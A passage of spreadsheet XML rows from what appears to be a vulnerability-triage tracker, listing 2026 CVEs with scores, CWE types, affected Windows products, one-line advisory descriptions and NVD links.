      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="D1014" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1014" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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4" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr"/>
      <c r="Q1014" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1014" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="D1015" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1015" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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5" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr"/>
      <c r="Q1015" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1015" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="D1016" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1016" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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6" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr"/>
      <c r="Q1016" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1016" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="D1017" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1017" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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7" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr"/>
      <c r="Q1017" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1017" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="D1018" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1018" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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8" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr"/>
      <c r="Q1018" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1018" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="D1019" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1019" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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19" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr"/>
      <c r="Q1019" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1019" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="D1020" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1020" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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0" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr"/>
      <c r="Q1020" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1020" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="D1021" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1021" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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1" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr"/>
      <c r="Q1021" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1021" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="D1022" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1022" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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2" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr"/>
      <c r="Q1022" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="D1023" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1023" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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3" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr"/>
      <c r="Q1023" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="D1024" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1024" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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4" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr"/>
      <c r="Q1024" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="D1025" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1025" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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5" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr"/>
      <c r="Q1025" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D1026" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1026" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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6" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr"/>
      <c r="Q1026" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D1027" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1027" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1027" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr"/>
      <c r="Q1027" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="D1028" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1028" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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8" s="5" t="inlineStr"/>
      <c r="M1028" s="5" t="inlineStr"/>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr"/>
      <c r="Q1028" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1028" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D1029" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1029" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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29" s="5" t="inlineStr"/>
      <c r="M1029" s="5" t="inlineStr"/>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr"/>
      <c r="Q1029" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R1029" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85983</t>
        </is>
      </c>
      <c r="D1030" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1030" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr"/>
      <c r="L1030" s="5" t="inlineStr"/>
      <c r="M1030" s="5" t="inlineStr"/>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr"/>
      <c r="Q1030" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R1030"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S1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9034</t>
        </is>
      </c>
      <c r="D1031" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1031" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr"/>
      <c r="L1031" s="5" t="inlineStr"/>
      <c r="M1031" s="5" t="inlineStr"/>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr"/>
      <c r="Q1031" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1031"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S1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18167</t>
        </is>
      </c>
      <c r="D1032" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1032" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1032" s="5" t="inlineStr"/>
